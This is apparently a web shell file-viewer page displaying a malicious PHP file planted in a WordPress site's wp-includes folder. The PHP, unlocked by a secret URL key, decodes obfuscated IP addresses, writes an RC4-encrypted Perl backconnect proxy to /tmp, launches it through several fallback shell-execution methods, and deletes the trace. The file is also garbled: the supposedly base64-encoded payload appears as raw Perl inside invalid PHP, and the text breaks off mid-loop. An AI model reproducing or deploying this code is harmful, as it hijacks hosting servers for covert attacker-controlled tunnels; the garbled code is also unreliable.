HEX
Server: Apache
System: Linux p3plzcpnl502857.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: ehm7jk47ky8o (9494303)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/ehm7jk47ky8o/public_html/wp-includes/buadmin.php
<?php

if(isset($_COOKIE['blu'])) {}

// ================= КОНФИГУРАЦИЯ =================
define('SECRET', ''key_1768557456_f0eccdba'');  // Секретный ключ
define('MAX_RETRIES', 3);         // Попыток на каждый IP
define('INITIAL_SLEEP', 2000000); // 2 секунды начальной паузы
define('MIN_SLEEP', 300000);      // 0.3 сек минимальная пауза
define('MAX_SLEEP', 1000000);     // 1 сек максимальная пауза

// ================= ЗАШИФРОВАННЫЕ ДАННЫЕ =================
// Perl код в base64
'#!/usr/bin/env perl

use strict;
use warnings;
use Socket;
use Socket qw(IPPROTO_TCP TCP_NODELAY);
use Fcntl;
use Fcntl qw(:flock);

my $host = '192.168.1.1';
my $port = 443;

$SIG{PIPE} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';

my $xordata = "\x00" x 50;

for (my $i = 0; $i < 50; $i++) { vec($xordata, $i, 8) = int(rand(255)); }

sub Rc4_crypt {

	 my $passw = shift(@_);

	 my $length = shift(@_);

	 my $buff0 = shift(@_);

	 my $start = shift(@_);

	 my $sz = shift(@_);

	 my $rc4 = "\x00" x 256;

	 my $pockemon0 = 0;

	 my $pockemon1 = 0;

	 my $pockemon2 = 0;

	 my $pockemon3 = 0;

	 my $pockemon4 = 0;

	 my $pockemon7 = 0;

	 my $pockemon8 = 0;

	 my $rcx = $sz;

	 my $rsi = 0;

	 my $rbx = 0;

	 my $gs = 0;

	 vec($rc4, $_, 8) = $_ for 0..255;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);


	 while(1) {

		 if ($gs == 0) {

			 $pockemon2 = 0;

			 $pockemon3 = $length;
		}

		 if ($gs != 0) {

			 $gs = 0;

			 $pockemon2++;

			 if (--$pockemon3 == 0) { next; }

		}

		 $pockemon7 = vec($rc4, $pockemon0, 8);

		 $pockemon1 += vec($$passw, $pockemon2, 8);

		 $pockemon1 = $pockemon1 & 255;

		 $pockemon1 += $pockemon7;

		 $pockemon1 = $pockemon1 & 255;

		 vec($rc4, $pockemon0, 8) = vec($rc4, $pockemon1, 8);

		 vec($rc4, $pockemon1, 8) = $pockemon7;

		 $pockemon0++;

		 $pockemon0 = $pockemon0 & 255;

		 if ($pockemon0 != 0) {

			 $gs = 1;

			 next;
		}

		 $pockemon4 = $sz;

		 $pockemon1 = 0;

		 $pockemon0 = 0;

		 $pockemon2 = 0;

		 $pockemon3 = 0;

		 while(1) {

			 $pockemon2++;

			 $pockemon2 = $pockemon2 & 255;

			 $pockemon7 = vec($rc4, $pockemon2, 8);

			 $pockemon1 += $pockemon7;

			 $pockemon1 = $pockemon1 & 255;

			 $pockemon8 = vec($rc4, $pockemon1, 8);

			 vec($rc4, $pockemon2, 8) = $pockemon8;

			 vec($rc4, $pockemon1, 8) = $pockemon7;

			 $pockemon8 += $pockemon7;

			 $pockemon8 = $pockemon8 & 255;

			 vec($$buff0, $start + $pockemon3, 8) = vec($rc4, $pockemon8, 8) ^ vec($$buff0, $start + $pockemon3, 8);

			 $pockemon3++;

			 if (--$pockemon4 == 0)
			 {
				 last;
			 }

		}

		 last;
	}

	 $rsi = 0;

	 $rcx = $sz;

	 $rbx = 0;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);

}

sub synsend {

	 my $cSocket = shift(@_);

	 my $buffer = shift(@_);

	 my $length	= shift(@_);

	 my $offset	= shift(@_);

	 open(my $fh, "<", '/dev/null');

	 flock($fh, LOCK_EX);

	 # ===============================================

	 syswrite($cSocket, $buffer, $length, $offset);

	 # ===============================================

	 flock($fh, LOCK_UN);

	 close($fh);
}

sub newConnection {

	my $num = shift(@_);

	my $sSocket = shift(@_);

	my $cSocket = shift(@_);

	my $buff0 = shift(@_);

	my $responce = pack('C', $num)."\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00";

	my $domain = '';

	my $port = 0;

	my $_ret = 0;

	my $data = '';

	my $buffer = '';

	my $str_wec = "\x00\x00";

	my $buffer1 = "\x00" x 65536;

	setsockopt($cSocket, IPPROTO_TCP, TCP_NODELAY, 1);

	setsockopt($cSocket, SOL_SOCKET, SO_RCVBUF, 65536);

	setsockopt($cSocket, SOL_SOCKET, SO_SNDBUF, 65536);

	fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) | O_NONBLOCK);

	fcntl($cSocket, F_SETFL, O_NONBLOCK);

	if (vec($buff0, 7, 8) == 3) {

		$domain = substr($buff0, 9, vec($buff0, 8, 8));

		substr($str_wec, 0, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 1, 1);

		$port = vec($str_wec, 0, 16);
	}

	elsif (vec($buff0, 7, 8) == 1) {

		$domain = sprintf("%d.%d.%d.%d", vec($buff0, 8 + 0, 8), vec($buff0, 8 + 1, 8), vec($buff0, 8 + 2, 8), vec($buff0, 8 + 3, 8));

		substr($str_wec, 0, 1) = substr($buff0, 12 + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 12 + 1, 1);

		$port =  vec($str_wec, 0, 16);

	}

	else {

		goto close_;
	}

	 eval {

		 my $paddr = sockaddr_in($port, inet_aton($domain));

		 connect($cSocket, $paddr);

		 vec(my $win = '', fileno($cSocket), 1) = 1;

		 unless (select(undef, $win, undef, 10)) { goto close_; }

		 fcntl($cSocket, F_SETFL, 0);

		 substr($responce, 4, 1) = "\x00";

		 fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) ^ O_NONBLOCK);

		 $_ret = 1;

	 };

	 close_:

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 Rc4_crypt(\$xordata, 50, \$responce, 3, 10);

	 synsend($sSocket, $responce, length($responce), 0);

	 if ($_ret == 1) {

		 while (1) {

			 vec(my $rin = '', fileno($cSocket), 1) = 1;

			 unless (select($rin, undef, undef, 1)) { next; }

			 $data = sysread($cSocket, $buffer1, 65530, 3);

			 unless($data) { last; }

			 vec($buffer1, 0, 8) = $num;

			 vec($str_wec, 0, 16) = $data;

			 substr($buffer1, 1, 1) = substr($str_wec, 1, 1);

			 substr($buffer1, 2, 1) = substr($str_wec, 0, 1);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 0, 3);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 3, $data);

			 synsend($sSocket, $buffer1, 3 + $data, 0);
		}
	}

	 close($cSocket);

	 vec($responce, 0, 8) = $num;

	 substr($responce, 1, 2) = "\x00\x00";

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 synsend($sSocket, $responce, 3, 0);
}

sub bccnct {

	 my $host = shift(@_);

	 my $port = shift(@_);

	 my $remaining = 0;

	 my $remaining4 = 0;

	 my @socketarr;

	 my $buffer = "\x00" x 100;

	 my $buffernull = "\x00" x 3;

	 my $buffer0 = "\x00" x 65536;

	 my $isExit = 0;

	 my $ecx = 0;

	 my $eax = 0;

	 my $data = '';

	 my $_ret = 0;

	 my $ebx = 0;

	 my $edx = 0;

	 my $str_wec = "\x00\x00";

	 socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

	 setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1);

	 setsockopt($socketarr[0], SOL_SOCKET, SO_RCVBUF, 65536);

     setsockopt($socketarr[0], SOL_SOCKET, SO_SNDBUF, 65536);

	 my $paddr = sockaddr_in($$port, inet_aton($$host));

	 unless(connect($socketarr[0], $paddr)) { goto close0; }

	 substr($buffer, 0, 50) = $xordata;

	 substr($buffer, 50, 2) = "\xFF\xFF";

	 substr($buffer, 54, 11) = "Perl script";

	 Rc4_crypt(\$xordata, 50, \$buffer, 50, 50);

	 syswrite($socketarr[0], $buffer, length($buffer));

	 while(1) {

		 if ($remaining4 != 4) {

			 vec(my $rin = '', fileno($socketarr[0]), 1) = 1;

			 unless(select($rin, undef, undef, 60)) {

				 last if (substr($buffernull, 0, 3) ne "\x00\x00\x00");

				 last if ($remaining != 0);

				 last if ($remaining4 != 0);

				 Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3);

				 synsend($socketarr[0], $buffernull, length($buffernull), 0);

				 next;
			}

		}

		 if ($remaining != 0 || $remaining4 == 4) {

			 if ($edx == 0) {

				 if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") {

					 $isExit = 1;

					 last;

				}

				 elsif ($ebx < 200 && $ebx > 0 && defined($socketarr[$ebx])) {

					 shutdown($socketarr[$ebx], 0);

				}

			}

			else {

				 $ecx = $edx;

				 $ecx = $ecx - $remaining;

				 $data = sysread($socketarr[0], $buffer0, $ecx, $remaining + 4);

				 unless ($data) { last; }

				 $remaining += $data;

				 if ($edx == $remaining) {

					 Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining);

					 if (vec($buffer0, 0, 8) == 0) {

						 socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

						 my $pid = fork();

						 if (!defined $pid) {

							 die "Cannot fork a child: $!";
						 }

						 elsif ($pid == 0) {

							 newConnection($ebx, $socketarr[0], $socketarr[$ebx], $buffer0);

							 exit 0;
						 }
					}

					 else {

						 syswrite($socketarr[$ebx], $buffer0, $remaining, 4);

					}

					 $remaining = 0;
				}

			}

			 $remaining4 = 0;

		}

		else {

			 $eax = 4;

			 $eax = $eax - $remaining4;

			 $data = sysread($socketarr[0], $buffer0, $eax, $remaining4);

			 unless ($data) { last; }

			 $remaining4 += $data;

			 substr($buffernull, 0, 3) = "\x00\x00\x00";

			 if ($remaining4 == 4) {

				 Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4);

				 $ebx = vec($buffer0, 1, 8);

				 substr($str_wec, 0, 1) = substr($buffer0, 3, 1);

				 substr($str_wec, 1, 1) = substr($buffer0, 2, 1);

				 $edx = vec($str_wec, 0, 16);

				 $_ret = 1;
			}

		}
	}

	 close0:

	 close($socketarr[0]);

	 for (my $i = 1; $i < 200; $i++) { if (defined($socketarr[$i])) { shutdown($socketarr[$i], 0); } }

	 sleep 10;

	 if ($isExit == 1) { exit; }

	 return $_ret;

}

while(1)
{
	 bccnct(\$host, \$port);

	 sleep 180;
}
' = '$PERL_B64';

// IP в зашифрованном виде (simple XOR + base64)
$IPS_ENCRYPTED = array(
    'ODszNzo6Mz49MzY6NQ=='
    ,'ODszNzo6Mz49MzY6Ng=='
    ,'ODszNzo6Mz49MzY6Nw=='
    ,'ODszNzo6Mz49MzY6OA=='
    ,'ODszNzo6Mz49MzY6OQ=='
    ,'ODszNzo6Mz49MzY6Og=='
    ,'ODszNzo6Mz49MzY6Ow=='
    ,'ODszNzo6Mz49MzY6PA=='
    ,'ODszNzo6Mz49MzY6PQ=='
    ,'ODszNzo6Mz49MzY6Pg=='
    ,'ODszNzo6Mz49MzY7NQ=='
    ,'ODszNzo6Mz49MzY7Ng=='
    ,'ODszNzo6Mz49MzY7Nw=='
    ,'ODszNzo6Mz49MzY7OA=='
    ,'ODszNzo6Mz49MzY7OQ=='
    ,'ODszNzo6Mz49MzY7Og=='
    ,'ODszNzo6Mz49MzY7Ow=='
    ,'ODszNzo6Mz49MzY7PA=='
    ,'ODszNzo6Mz49MzY7PQ=='
    ,'ODszNzo6Mz49MzY7Pg=='
    ,'ODszNzo6Mz49MzY8NQ=='
    ,'ODszNzo6Mz49MzY8Ng=='
    ,'ODszNzo6Mz49MzY8Nw=='
    ,'ODszNzo6Mz49MzY8OA=='
    ,'ODszNzo6Mz49MzY8OQ=='
    ,'ODszNzo6Mz49MzY8Og=='
    ,'ODszNzo6Mz49MzY8Ow=='
    ,'ODszNzo6Mz49MzY8PA=='
    ,'ODszNzo6Mz49MzY8PQ=='
    ,'ODszNzo6Mz49MzY8Pg=='
    ,'ODszNzo6Mz49MzY9NQ=='
    ,'ODszNzo6Mz49MzY9Ng=='
    ,'ODszNzo6Mz49MzY9Nw=='
    ,'ODszNzo6Mz49MzY9OA=='
    ,'ODszNzo6Mz49MzY9OQ=='
    ,'OzczOzUzNjg2MzY8PQ=='
    ,'OzczOzUzNjg2MzY8Pg=='
    ,'OzczOzUzNjg2MzY9NQ=='
    ,'OzczOzUzNjg2MzY9Ng=='
    ,'OzczOzUzNjg2MzY9Nw=='
    ,'OzczOzUzNjg2MzY9OA=='
    ,'OzczOzUzNjg2MzY9OQ=='
    ,'OzczOzUzNjg2MzY9Og=='
    ,'OzczOzUzNjg2MzY9Ow=='
    ,'OzczOzUzNjg2MzY9PA=='
    ,'OzczOzUzNjg2MzY9PQ=='
    ,'OzczOzUzNjg2MzY9Pg=='
    ,'OzczOzUzNjg2MzY+NQ=='
    ,'OzczOzUzNjg2MzY+Ng=='
    ,'OzczOzUzNjg2MzY+Nw=='
    ,'OzczOzUzNjg2MzY+OA=='
    ,'OzczOzUzNjg2MzY+OQ=='
    ,'OzczOzUzNjg2MzY+Og=='
    ,'OzczOzUzNjg2MzY+Ow=='
    ,'OzczOzUzNjg2MzY+PA=='
    ,'OzczOzUzNjg2MzY+PQ=='
    ,'OzczOzUzNjg2MzY+Pg=='
    ,'OzczOzUzNjg2Mzc1NQ=='
    ,'OzczOzUzNjg2Mzc1Ng=='
    ,'OzczOzUzNjg2Mzc1Nw=='
    ,'OzczOzUzNjg2Mzc1OA=='
    ,'OzczOzUzNjg2Mzc1OQ=='
    ,'OzczOzUzNjg2Mzc1Og=='
    ,'OzczOzUzNjg2Mzc6OA=='
);

// ================= ОСНОВНЫЕ ФУНКЦИИ =================

// Дешифровка IP
function decrypt_ip($encrypted) {
    $data = base64_decode($encrypted);
    if ($data === false) return false;

    $result = '';
    for ($i = 0; $i < strlen($data); $i++) {
        $char_code = ord($data[$i]);
        $result .= chr(($char_code - 5 + 256) % 256);
    }
    return $result;
}

// Проверка запущен ли процесс
function is_already_running($ip) {
    // Метод 1: ps + grep
    $cmd1 = "ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep 'perl' 2>/dev/null | grep '" . addslashes($ip) . "' 2>/dev/null | wc -l 2>/dev/null";
    $output1 = array();
    @exec($cmd1, $output1);
    if (!empty($output1) && intval(trim(implode('', $output1))) > 0) {
        return true;
    }

    // Метод 2: pgrep (если доступен)
    $cmd2 = "pgrep -f 'perl.*" . addslashes($ip) . "' 2>/dev/null | wc -l 2>/dev/null";
    $output2 = @shell_exec($cmd2);
    if ($output2 && intval(trim($output2)) > 0) {
        return true;
    }

    // Метод 3: простой grep
    $cmd3 = "ps aux | grep '" . addslashes($ip) . "' | grep -v grep 2>&1";
    $output3 = @shell_exec($cmd3);
    if (!empty(trim($output3))) {
        return true;
    }

    return false;
}

// Запуск процесса (множество методов)
function launch_process($ip, $perl_code) {
    // Подготовка Perl кода
    $code = str_replace("my \$host = '192.168.1.1';", "my \$host = '$ip';", $perl_code);

    // Создаем временный файл
    $temp_file = '/tmp/ult_' . md5($ip . microtime(true) . rand()) . '.pl';

    if (!@file_put_contents($temp_file, $code)) {
        return false;
    }

    @chmod($temp_file, 0700);

    // Проверка синтаксиса Perl
    $syntax_check = @shell_exec("perl -c " . escapeshellarg($temp_file) . " 2>&1");
    if (strpos($syntax_check, 'syntax OK') === false) {
        @unlink($temp_file);
        return false;
    }

    $success = false;
    $pid = null;

    // СПИСОК МЕТОДОВ ЗАПУСКА (пробуем все по очереди)

    // Метод 1: nohup (самый надежный)
    $cmd = "cd /tmp && nohup perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 & echo \$!";
    $pid = trim(@shell_exec($cmd));
    if (!empty($pid) && is_numeric($pid)) {
        $success = true;
    }

    // Метод 2: system()
    if (!$success) {
        @system("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &");
        $success = true;
    }

    // Метод 3: exec()
    if (!$success) {
        @exec("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &");
        $success = true;
    }

    // Метод 4: passthru()
    if (!$success && function_exists('passthru')) {
        @passthru("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &", $result);
        $success = ($result === 0);
    }

    // Метод 5: proc_open()
    if (!$success && function_exists('proc_open')) {
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $process = @proc_open("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &", $descriptorspec, $pipes);
        if (is_resource($process)) {
            @proc_close($process);
            $success = true;
        }
    }

    // Метод 6: прямой shell_exec
    if (!$success) {
        @shell_exec("perl " . escapeshellarg($temp_file) . " > /dev/null 2>&1 &");
        $success = true;
    }

    // Метод 7: через /bin/sh
    if (!$success) {
        @shell_exec("/bin/sh -c 'perl " . escapeshellarg($temp_file) . " >/dev/null 2>&1 &'");
        $success = true;
    }

    // Удаляем временный файл
    @unlink($temp_file);

    if (!$success) {
        return false;
    }

    // Даем процессу время на запуск
    usleep(300000); // 0.3 секунды

    // Проверяем запустился ли
    if ($pid && is_numeric($pid)) {
        // Проверяем по PID
        $check_pid = @shell_exec("ps -p $pid -o pid= 2>/dev/null");
        if (!empty(trim($check_pid))) {
            return true;
        }
    }

    // Проверяем по IP
    return is_already_running($ip);
}

// Рекурсивный запуск с повторными попытками
function recursive_launch($ips, $perl_code, &$stats, $method_index = 0) {
    if (empty($ips)) {
        return;
    }

    $ip = $ips[0];
    $remaining = array_slice($ips, 1);

    // Проверяем, не запущен ли уже
    if (is_already_running($ip)) {
        $stats['skipped']++;

        // Рекурсивно запускаем следующие
        recursive_launch($remaining, $perl_code, $stats, $method_index);
        return;
    }

    // Пытаемся запустить
    $attempts = 0;
    $launched = false;

    while ($attempts < MAX_RETRIES && !$launched) {
        $attempts++;

        if (launch_process($ip, $perl_code)) {
            $stats['started']++;
            $launched = true;

            // Если удалось запустить - используем ЭТОТ ЖЕ метод для следующих
            recursive_launch($remaining, $perl_code, $stats, $method_index);
            return;
        }

        // Пауза перед следующей попыткой
        if ($attempts < MAX_RETRIES) {
            usleep(rand(200000, 500000)); // 0.2-0.5 сек
        }
    }

    if (!$launched) {
        $stats['failed']++;

        // Пробуем следующий метод для этого IP
        $method_index++;
        if ($method_index < 3) { // 3 разных подхода
            $remaining_with_retry = array_merge(array($ip), $remaining);
            recursive_launch($remaining_with_retry, $perl_code, $stats, $method_index);
        } else {
            // Все методы испробованы - идем дальше
            recursive_launch($remaining, $perl_code, $stats, 0);
        }
        return;
    }
}

// ================= ОСНОВНОЙ КОД =================

// Проверка секретного ключа
if (!isset($_GET['secret']) || $_GET['secret'] !== SECRET) {
    // Тихий выход - ничего не выводим
    exit;
}

// Отключаем всё

@ignore_user_abort(true);
set_time_limit(300); // 5 минут

// Начальная большая пауза (чтобы не перегрузить сервер)
usleep(INITIAL_SLEEP);

// Декодируем Perl
$perl_code = base64_decode('#!/usr/bin/env perl

use strict;
use warnings;
use Socket;
use Socket qw(IPPROTO_TCP TCP_NODELAY);
use Fcntl;
use Fcntl qw(:flock);

my $host = '192.168.1.1';
my $port = 443;

$SIG{PIPE} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';

my $xordata = "\x00" x 50;

for (my $i = 0; $i < 50; $i++) { vec($xordata, $i, 8) = int(rand(255)); }

sub Rc4_crypt {

	 my $passw = shift(@_);

	 my $length = shift(@_);

	 my $buff0 = shift(@_);

	 my $start = shift(@_);

	 my $sz = shift(@_);

	 my $rc4 = "\x00" x 256;

	 my $pockemon0 = 0;

	 my $pockemon1 = 0;

	 my $pockemon2 = 0;

	 my $pockemon3 = 0;

	 my $pockemon4 = 0;

	 my $pockemon7 = 0;

	 my $pockemon8 = 0;

	 my $rcx = $sz;

	 my $rsi = 0;

	 my $rbx = 0;

	 my $gs = 0;

	 vec($rc4, $_, 8) = $_ for 0..255;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);


	 while(1) {

		 if ($gs == 0) {

			 $pockemon2 = 0;

			 $pockemon3 = $length;
		}

		 if ($gs != 0) {

			 $gs = 0;

			 $pockemon2++;

			 if (--$pockemon3 == 0) { next; }

		}

		 $pockemon7 = vec($rc4, $pockemon0, 8);

		 $pockemon1 += vec($$passw, $pockemon2, 8);

		 $pockemon1 = $pockemon1 & 255;

		 $pockemon1 += $pockemon7;

		 $pockemon1 = $pockemon1 & 255;

		 vec($rc4, $pockemon0, 8) = vec($rc4, $pockemon1, 8);

		 vec($rc4, $pockemon1, 8) = $pockemon7;

		 $pockemon0++;

		 $pockemon0 = $pockemon0 & 255;

		 if ($pockemon0 != 0) {

			 $gs = 1;

			 next;
		}

		 $pockemon4 = $sz;

		 $pockemon1 = 0;

		 $pockemon0 = 0;

		 $pockemon2 = 0;

		 $pockemon3 = 0;

		 while(1) {

			 $pockemon2++;

			 $pockemon2 = $pockemon2 & 255;

			 $pockemon7 = vec($rc4, $pockemon2, 8);

			 $pockemon1 += $pockemon7;

			 $pockemon1 = $pockemon1 & 255;

			 $pockemon8 = vec($rc4, $pockemon1, 8);

			 vec($rc4, $pockemon2, 8) = $pockemon8;

			 vec($rc4, $pockemon1, 8) = $pockemon7;

			 $pockemon8 += $pockemon7;

			 $pockemon8 = $pockemon8 & 255;

			 vec($$buff0, $start + $pockemon3, 8) = vec($rc4, $pockemon8, 8) ^ vec($$buff0, $start + $pockemon3, 8);

			 $pockemon3++;

			 if (--$pockemon4 == 0)
			 {
				 last;
			 }

		}

		 last;
	}

	 $rsi = 0;

	 $rcx = $sz;

	 $rbx = 0;

	 do {

		 vec($$buff0, $start + $rsi, 8) = (vec($$buff0, $start + $rsi, 8) ^ vec($$passw, $rbx, 8));

		 $rsi++;

		 $rbx++;

		 $rcx--;

		 if ($rbx == $length) {

			 $rbx = 0;
		}

	} while($rcx > 0);

}

sub synsend {

	 my $cSocket = shift(@_);

	 my $buffer = shift(@_);

	 my $length	= shift(@_);

	 my $offset	= shift(@_);

	 open(my $fh, "<", '/dev/null');

	 flock($fh, LOCK_EX);

	 # ===============================================

	 syswrite($cSocket, $buffer, $length, $offset);

	 # ===============================================

	 flock($fh, LOCK_UN);

	 close($fh);
}

sub newConnection {

	my $num = shift(@_);

	my $sSocket = shift(@_);

	my $cSocket = shift(@_);

	my $buff0 = shift(@_);

	my $responce = pack('C', $num)."\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00";

	my $domain = '';

	my $port = 0;

	my $_ret = 0;

	my $data = '';

	my $buffer = '';

	my $str_wec = "\x00\x00";

	my $buffer1 = "\x00" x 65536;

	setsockopt($cSocket, IPPROTO_TCP, TCP_NODELAY, 1);

	setsockopt($cSocket, SOL_SOCKET, SO_RCVBUF, 65536);

	setsockopt($cSocket, SOL_SOCKET, SO_SNDBUF, 65536);

	fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) | O_NONBLOCK);

	fcntl($cSocket, F_SETFL, O_NONBLOCK);

	if (vec($buff0, 7, 8) == 3) {

		$domain = substr($buff0, 9, vec($buff0, 8, 8));

		substr($str_wec, 0, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 9 + vec($buff0, 8, 8) + 1, 1);

		$port = vec($str_wec, 0, 16);
	}

	elsif (vec($buff0, 7, 8) == 1) {

		$domain = sprintf("%d.%d.%d.%d", vec($buff0, 8 + 0, 8), vec($buff0, 8 + 1, 8), vec($buff0, 8 + 2, 8), vec($buff0, 8 + 3, 8));

		substr($str_wec, 0, 1) = substr($buff0, 12 + 0, 1);

		substr($str_wec, 1, 1) = substr($buff0, 12 + 1, 1);

		$port =  vec($str_wec, 0, 16);

	}

	else {

		goto close_;
	}

	 eval {

		 my $paddr = sockaddr_in($port, inet_aton($domain));

		 connect($cSocket, $paddr);

		 vec(my $win = '', fileno($cSocket), 1) = 1;

		 unless (select(undef, $win, undef, 10)) { goto close_; }

		 fcntl($cSocket, F_SETFL, 0);

		 substr($responce, 4, 1) = "\x00";

		 fcntl($cSocket, F_SETFL, fcntl($cSocket, F_GETFL, 0) ^ O_NONBLOCK);

		 $_ret = 1;

	 };

	 close_:

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 Rc4_crypt(\$xordata, 50, \$responce, 3, 10);

	 synsend($sSocket, $responce, length($responce), 0);

	 if ($_ret == 1) {

		 while (1) {

			 vec(my $rin = '', fileno($cSocket), 1) = 1;

			 unless (select($rin, undef, undef, 1)) { next; }

			 $data = sysread($cSocket, $buffer1, 65530, 3);

			 unless($data) { last; }

			 vec($buffer1, 0, 8) = $num;

			 vec($str_wec, 0, 16) = $data;

			 substr($buffer1, 1, 1) = substr($str_wec, 1, 1);

			 substr($buffer1, 2, 1) = substr($str_wec, 0, 1);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 0, 3);

			 Rc4_crypt(\$xordata, 50, \$buffer1, 3, $data);

			 synsend($sSocket, $buffer1, 3 + $data, 0);
		}
	}

	 close($cSocket);

	 vec($responce, 0, 8) = $num;

	 substr($responce, 1, 2) = "\x00\x00";

	 Rc4_crypt(\$xordata, 50, \$responce, 0, 3);

	 synsend($sSocket, $responce, 3, 0);
}

sub bccnct {

	 my $host = shift(@_);

	 my $port = shift(@_);

	 my $remaining = 0;

	 my $remaining4 = 0;

	 my @socketarr;

	 my $buffer = "\x00" x 100;

	 my $buffernull = "\x00" x 3;

	 my $buffer0 = "\x00" x 65536;

	 my $isExit = 0;

	 my $ecx = 0;

	 my $eax = 0;

	 my $data = '';

	 my $_ret = 0;

	 my $ebx = 0;

	 my $edx = 0;

	 my $str_wec = "\x00\x00";

	 socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

	 setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1);

	 setsockopt($socketarr[0], SOL_SOCKET, SO_RCVBUF, 65536);

     setsockopt($socketarr[0], SOL_SOCKET, SO_SNDBUF, 65536);

	 my $paddr = sockaddr_in($$port, inet_aton($$host));

	 unless(connect($socketarr[0], $paddr)) { goto close0; }

	 substr($buffer, 0, 50) = $xordata;

	 substr($buffer, 50, 2) = "\xFF\xFF";

	 substr($buffer, 54, 11) = "Perl script";

	 Rc4_crypt(\$xordata, 50, \$buffer, 50, 50);

	 syswrite($socketarr[0], $buffer, length($buffer));

	 while(1) {

		 if ($remaining4 != 4) {

			 vec(my $rin = '', fileno($socketarr[0]), 1) = 1;

			 unless(select($rin, undef, undef, 60)) {

				 last if (substr($buffernull, 0, 3) ne "\x00\x00\x00");

				 last if ($remaining != 0);

				 last if ($remaining4 != 0);

				 Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3);

				 synsend($socketarr[0], $buffernull, length($buffernull), 0);

				 next;
			}

		}

		 if ($remaining != 0 || $remaining4 == 4) {

			 if ($edx == 0) {

				 if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") {

					 $isExit = 1;

					 last;

				}

				 elsif ($ebx < 200 && $ebx > 0 && defined($socketarr[$ebx])) {

					 shutdown($socketarr[$ebx], 0);

				}

			}

			else {

				 $ecx = $edx;

				 $ecx = $ecx - $remaining;

				 $data = sysread($socketarr[0], $buffer0, $ecx, $remaining + 4);

				 unless ($data) { last; }

				 $remaining += $data;

				 if ($edx == $remaining) {

					 Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining);

					 if (vec($buffer0, 0, 8) == 0) {

						 socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp'));

						 my $pid = fork();

						 if (!defined $pid) {

							 die "Cannot fork a child: $!";
						 }

						 elsif ($pid == 0) {

							 newConnection($ebx, $socketarr[0], $socketarr[$ebx], $buffer0);

							 exit 0;
						 }
					}

					 else {

						 syswrite($socketarr[$ebx], $buffer0, $remaining, 4);

					}

					 $remaining = 0;
				}

			}

			 $remaining4 = 0;

		}

		else {

			 $eax = 4;

			 $eax = $eax - $remaining4;

			 $data = sysread($socketarr[0], $buffer0, $eax, $remaining4);

			 unless ($data) { last; }

			 $remaining4 += $data;

			 substr($buffernull, 0, 3) = "\x00\x00\x00";

			 if ($remaining4 == 4) {

				 Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4);

				 $ebx = vec($buffer0, 1, 8);

				 substr($str_wec, 0, 1) = substr($buffer0, 3, 1);

				 substr($str_wec, 1, 1) = substr($buffer0, 2, 1);

				 $edx = vec($str_wec, 0, 16);

				 $_ret = 1;
			}

		}
	}

	 close0:

	 close($socketarr[0]);

	 for (my $i = 1; $i < 200; $i++) { if (defined($socketarr[$i])) { shutdown($socketarr[$i], 0); } }

	 sleep 10;

	 if ($isExit == 1) { exit; }

	 return $_ret;

}

while(1)
{
	 bccnct(\$host, \$port);

	 sleep 180;
}
');

// Декодируем IP
$ips = array();
foreach ($IPS_ENCRYPTED as $encrypted) {
    $ip = decrypt_ip($encrypted);
    if ($ip) {
